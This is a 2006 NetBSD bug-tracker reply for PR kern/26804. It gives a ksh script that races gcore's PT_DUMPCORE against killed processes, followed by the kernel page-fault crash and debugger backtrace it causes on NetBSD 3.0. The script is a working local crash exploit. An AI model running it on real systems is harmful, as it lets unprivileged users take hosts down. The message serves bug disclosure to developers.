netbsd-bugs: Re: kern/26804

Subject: Re: kern/26804
To: None <kern-bug-people@netbsd.org, gnats-admin@netbsd.org,>
From: Kirk Russell <kirk@ba23.org>
List: netbsd-bugs
Date: 03/10/2006 14:30:01
The following reply was made to PR kern/26804; it has been noted by GNATS.

From: Kirk Russell <kirk@ba23.org>
To: gnats-bugs@NetBSD.org
Cc: kirk@ba23.org
Subject: Re: kern/26804
Date: Fri, 10 Mar 2006 09:29:01 -0500 (EST)

 Here is a shell script that can exploit the PT_DUMPCORE holes.
 
 : {3} uname -a
 NetBSD  3.0 NetBSD 3.0 (GENERIC) #0: Mon Dec 19 01:04:02 UTC 2005  builds@works.netbsd.org:/home/builds/ab/netbsd-3-0-RELEASE/i386/200512182024Z-obj/home/builds/ab/netbsd-3-0-RELEASE/src/sys/arch/i386/compile/GENERIC i386
 : {4} cat corecrash.sh
 #!/bin/ksh
 while true
 do
         rm *.core
 
         for x in 1 2 3 4 5 6 7 8 9
         do
                 sleep 10000 &
         done
 
         for x in $(ps | awk '/sleep/ { print $1}')
         do
                 gcore -c $x.core $x $$ $x $$ $x $$ $x &
         done
         ps | awk '/sleep/ {print $1}' | xargs kill
 done
 : {5} chmod a+x corecrash.sh
 : {6} ./corecrash.sh
 gcore: ptrace(PT_DUMPCORE) failed: No such process
 kill: 463: No such process
 gcore: ptrace(PT_DUMPCORE) failed: No such process
 gcore: ptrace(PT_DUMPCORE) failed: No such process
 gcore: ptrace(PT_DUMPCORE) failed: No such process
 gcore: ptrace(PT_DUMPCORE) failed: No such process
 gcore: ptrace(PT_DUMPCORE) failed: No such process
 gcore: ptrace(PT_DUMPCORE) failed: No such process
 gcore: ptrace(PT_DUMPCORE) failed: No such process
 gcore: ptrace(PT_DUMPCORE) failed: No such process
 gcore: ptrace(PT_DUMPCORE) failed: No such process
 uvm_fault(0xcb1a1624, 0, 0, 1) -> 0xe
  kernel: page fault trap, code=0
  Stopped in pid 542.1 (gcore) at netbsd:coredump_notes_elf32+0x1db:      movl    0
  x8(%edx),%eax
  db> bt
  coredump_notes_elf32(cb15d4d0,ca38bbdc,cb16c888,ca3800fc,cadd091c) at netbsd:cor
  edump_notes_elf32+0x1db
  coredump_elf32(ca38bbdc,cb16c888,ca3800fc,2,1) at netbsd:coredump_elf32+0x22c
  coredump(ca38bbdc,c0ccd110,8,0,ca395700) at netbsd:coredump+0x29c
  sys_ptrace(cb1a43a0,cadd0f64,cadd0f5c,0,cadd0fa4) at netbsd:sys_ptrace+0x3c5
  syscall_plain() at netbsd:syscall_plain+0x7e
  --- syscall (number 26) ---
  0xbdb48946:
  db>
 
 
 -- 
 Kirk Russell            <kirk@ba23.org>            http://www.ba23.org/
 Bridlewood Software Testers Guild                  Ottawa Ontario Canada